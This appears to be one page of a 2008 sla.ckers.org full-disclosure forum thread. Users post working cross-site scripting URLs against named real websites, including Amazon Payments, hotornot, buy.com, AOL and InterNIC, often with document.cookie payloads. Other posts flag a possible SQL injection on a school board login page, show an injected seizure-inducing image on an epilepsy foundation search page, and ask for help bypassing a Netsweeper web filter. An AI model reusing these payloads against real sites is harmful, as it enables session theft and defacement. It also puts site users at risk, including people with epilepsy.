Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...5253545556575859606162...LastNext
Current Page: 57 of 65
Re: So it begins
Posted by: kirke
Date: June 16, 2008 06:13AM

didn't go through the history here if some of them are already known, but nice website spoofing with iframes anyway ;-)
http://wired-security.net/archive/2008/june/index.php#16062008
( http://baseportal.com/baseportal/phishmarkt/commix )

Options: ReplyQuote
Re: So it begins
Date: June 18, 2008 09:13PM

https://www.lawrencefreenet.org/signon/index.php?&acctMsg=%3Cscript%3Ealert(1)%3C/script%3E

https://www.lawrencefreenet.org/signon/index.php?&dpMsg=%3Cscript%3Ealert(1)%3C/script%3E

bastards that won't stop sending me junkmail.

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: July 01, 2008 10:45AM

I am not amused.

http://xssdb.dabbledb.com/p%3Cscript%3Ealert(%27XSS%27)%3C/script%3Eublish

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: July 01, 2008 10:47AM

@mario

lol

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: July 03, 2008 05:45PM

sorry, Cryptic...

http://tinyurl.com/69ffba

Options: ReplyQuote
Re: So it begins
Posted by: nav
Date: July 07, 2008 06:25AM

Wanna download drivers for your acer?
http://www.acerpanam.com/synapse/forms/portal20.cfm?website=AcerPanAm.com/canada&siteid=7297&areaid=17&formid=3394&LINKTEXT=%3Cscript%3Ealert(1)%3C/script%3EDrivers%20%26%20Downloads

Options: ReplyQuote
The 0s0 Famous Sql Injection exploits........
Posted by: Anonymous User
Date: July 20, 2008 10:01AM

For anyone who is currently enroled in the Peel District Board System of Education bewhare...Possible SQL Injection Avaible ----------------> http://oweb.peelschools.org/pls/opt/OPT.check_password
It's been 2 years since and they still have not fixed this P.S pay attention to the source in this http://oweb.peelschools.org/pls/opt/OPT.main?IN_SCREEN=LOGIN and
http://oweb.peelschools.org/pls/opt/OPT.check_password thats all for now......

Options: ReplyQuote
Re: So it begins
Posted by: DoctorDan
Date: July 20, 2008 11:48AM

I found this to be a pretty interesting vector...
http://www.borders.com/online/store/SearchResults?title=XSS%22%3E%3Cx'%7D+alert(%2FXSS%2F)%2C+function+a()+%7B%2F%2F

EDIT: fixing URL/linkage



Edited 2 time(s). Last edit at 07/20/2008 11:55AM by DoctorDan.

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: July 24, 2008 04:51PM

http://www.watchmouse.com/en/security_news.php/%22%3E%3Cimg%20src=x%20onerror=%22if(typeof%20a==(typeof%20b))%7Ba=0%7D;alert(a+++%27%20left...%27);%22%3E

no comment

Options: ReplyQuote
Re: So it begins
Posted by: krazl
Date: July 25, 2008 03:46AM

Netsweeper... hahaha... secure but not secure enough.

http://172.19.110.102:8080/webadmin/deny/index.php?dpid=-19&cat=-11&ttl=-348&groupname=obama&policyname=restrict&username=sla.ckers&userip=99.999.999.999&connectionip=256.0.0.256&nsphostname=google.com&protocol=bush&dplanguage=-&url=<script>alert("1");</script>

http://www.krazl.com



Edited 1 time(s). Last edit at 07/25/2008 03:58AM by krazl.

Options: ReplyQuote
Re: So it begins
Posted by: thrill
Date: July 25, 2008 11:41AM

Quote

172.19.110.102:8080

What do you get when you check 127.0.0.1:8080?

Or are you just saying that netsweeper has a vuln on one of your local machines?

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: So it begins
Date: July 25, 2008 01:56PM

>> Or are you just saying that netsweeper has a vuln on one of your local machines?

lol, I just noticed the private range too O.O, I'll give him the benefit of the doubt and say that those IPs are now being leased out for non-private use. Didn't you get the memo?

Options: ReplyQuote
Re: So it begins
Posted by: krazl
Date: July 27, 2008 10:25PM

I've edit most of the parameter to avoid same thing happen to you at office.

Currently need a breakthru to bypass netsweeper. Anyone?

CrYpTiC_MauleR Wrote:
-------------------------------------------------------
> >> Or are you just saying that netsweeper has a
> vuln on one of your local machines?
>
> lol, I just noticed the private range too O.O,
> I'll give him the benefit of the doubt and say
> that those IPs are now being leased out for
> non-private use. Didn't you get the memo?

http://www.krazl.com

Options: ReplyQuote
Re: So it begins
Posted by: krazl
Date: July 27, 2008 10:38PM

well known "Fail to connect"

thrill Wrote:
-------------------------------------------------------
> 172.19.110.102:8080
>
> What do you get when you check 127.0.0.1:8080?
>
> Or are you just saying that netsweeper has a vuln
> on one of your local machines?

http://www.krazl.com

Options: ReplyQuote
Re: So it begins
Posted by: thrill
Date: July 28, 2008 01:46AM

Quote

well known "Fail to connect"

In Engrish?

RFC1918 - Cliff Notes Internal Network Version

10.0.0.0 - 10.255.255.255 (10/8 prefix)
172.16.0.0 - 172.31.255.255 (172.16/12 prefix)
192.168.0.0 - 192.168.255.255 (192.168/16 prefix)

So 172.19.110.102 falls inside the 172.16.0.0 - 172.31.255.255 range, which in turn == INTERNAL FREAKING ADDRESS to YOUR network.. but please, let me know if I'm not being clear in any way.

Or wait.. are you speaking about the 127.0.0.1 LOCALHOST IP address, which also happens to be a 'restricted local loopback IP' type deal?

I think what we have here is a failure to communicate.. but maybe id would like to take you up on basic networking.. I's just be too tired.. And I's be going to bed now..

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill



Edited 2 time(s). Last edit at 07/28/2008 01:51AM by thrill.

Options: ReplyQuote
Re: So it begins
Date: July 28, 2008 08:20AM

>> but maybe id would like to take you up on basic networking.

Where do I enroll for this class?

Options: ReplyQuote
Re: So it begins
Posted by: krazl
Date: July 28, 2008 09:21PM

hmm.. I know it's being store to server.. currently i want to know any breakthru to bypass netsweeper system by providing link. anyone?

http://www.krazl.com

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: July 30, 2008 04:26PM

https://payments.amazon.com/sdui/sdui/productsServices?sn=%22%20onerror%3D%22alert%28document.domain%29/a

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: asilvermtzion
Date: August 01, 2008 07:00PM

You've got to be kidding!

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: August 02, 2008 05:12PM

hot or not
woks on ie........
http://meetme.hotornot.com/?5570=21872&vt=32&state=vote&vote=yes&votee=%22><script>alert(document.cookie);</script>
another IE only one as well
http://hotlists.hotornot.com/Style-g961172-Heroes.html?rid=%22><script>alert(document.cookie);</script>
and another IE, this is getting way too easy
http://hotlists.hotornot.com/?state=embed&wid=NLOSGZEL%22><script>alert(document.cookie);</script>&authToken=undefined&Username=%22><script>alert(document.cookie);</script>

this one works on both, bah too simple tho
http://scoreboards.hotornot.com/?groupname=<script>alert(document.cookie);</script>

wow this is getting too easy
http://hotlists.hotornot.com/?state=browse&tag=boobs<script>alert(document.cookie);</script>

and finally got one on the .com itself
http://www.hotornot.com/popup/share.html?eid=NQELHEG&key=XAQ&source=><script>alert(document.cookie);</script>

http://www.xssed.com/archive/author=PaPPy/



Edited 5 time(s). Last edit at 08/05/2008 07:36PM by PaPPy.

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: August 04, 2008 08:26PM

http://wocares.com/pf3.php?i=2&url=http%3A//www.epilepsyfoundation.org/search/index.cfm&name0=q&post0=%22%29%3B%20%3C/script%3E%3Cbody%20onload%3D%22document.write%28%27%3Cbody%20background%3D%5C%27http%3A//wocares.com/host/images/503538_seizure.gif%5C%27%3E%27%29%22%3E&name1=sa&post1=Search


edit: aol

hxxp://search.aol.com/aol/redirWarn?redirAuth=nauth&clickedItemURN=http://wocares.com/sieben"><script>alert('XSS')</script>



Edited 2 time(s). Last edit at 08/04/2008 08:59PM by Kyo.

Options: ReplyQuote
Re: So it begins
Posted by: asilvermtzion
Date: August 05, 2008 06:22PM

I actually just pissed myself laughing at the seizure one, reminds me of the 4chan raid



Edited 1 time(s). Last edit at 08/06/2008 04:37AM by asilvermtzion.

Options: ReplyQuote
Re: So it begins
Posted by: trev
Date: August 05, 2008 06:38PM

Right, secure shopping:

[secureshopping.mcafee.com] (move your mouse over any link on the right)

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: August 19, 2008 05:05PM

http://www.buy.com/retail/usersearchresults.asp?querytype=home&qu=%27%2balert%28document.domain%29%2b%27&qxt=home&display=col

http://www.buy.com/retail/usersearchresults.asp?querytype=home&qu=%22%20onmouseover%3D%22alert%28document.domain%29%3B//&qxt=home&display=col

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: thrill
Date: August 19, 2008 05:19PM

darn, and I was really looking forward to getting an OnMouseOver for christmas..

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: August 19, 2008 08:26PM

tx Wrote:
-------------------------------------------------------
> http://www.buy.com/retail/usersearchresults.asp?qu
> erytype=home&qu=%27%2balert%28document.domain%29%2
> b%27&qxt=home&display=col
>
> http://www.buy.com/retail/usersearchresults.asp?qu
> erytype=home&qu=%22%20onmouseover%3D%22alert%28doc
> ument.domain%29%3B//&qxt=home&display=col


This is patched, but you can still inject into the description <meta tag, some way of exploiting that?

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: August 19, 2008 11:44PM

@Kyo: both still work for me. Also, if you view source, you'll see that there are a number of different issues that can exploited with a slight change in syntax. I looked into the META tag route, but it's not possible as far as I can tell.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: August 22, 2008 02:17AM

http://reports.internic.net/cgi/whois?whois_nic=<script>alert('xss');</script>moo+&type=domain

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: Reiners
Date: August 29, 2008 10:24AM

http://www.steuerliches-info-center.de/cgi-bin/htsearch?words=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E+%5C&config=bzst_sic_de

http://www.myspass.de/de/list/videos?pattern=asd%22%3E%3Cscript%3Ealert(1)%3C/script%3E



Edited 1 time(s). Last edit at 08/29/2008 04:56PM by Reiners.

Options: ReplyQuote
Re: So it begins
Posted by: nEUrOO
Date: August 31, 2008 02:06PM

Well, since it's and anti-phishing company, I won't tell them first:

hxxp://www.markmonitor.com/cgi-bin/affsearch.cgi?dn=hehe%22+onmouseover%3D%27alert(1)%27%3E%3C&x=0&y=0&template=markmon&return=https%3A%2F%2Fcorp.markmonitor.com%2Findex.ald%3Ftab2name%3Ddomain%26sub2name%3Ddomregistration%26sub%3Dregistration%26sub2name%3Ddomregistration&partner=yes

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Pages: PreviousFirst...5253545556575859606162...LastNext
Current Page: 57 of 65


Sorry, only registered users may post in this forum.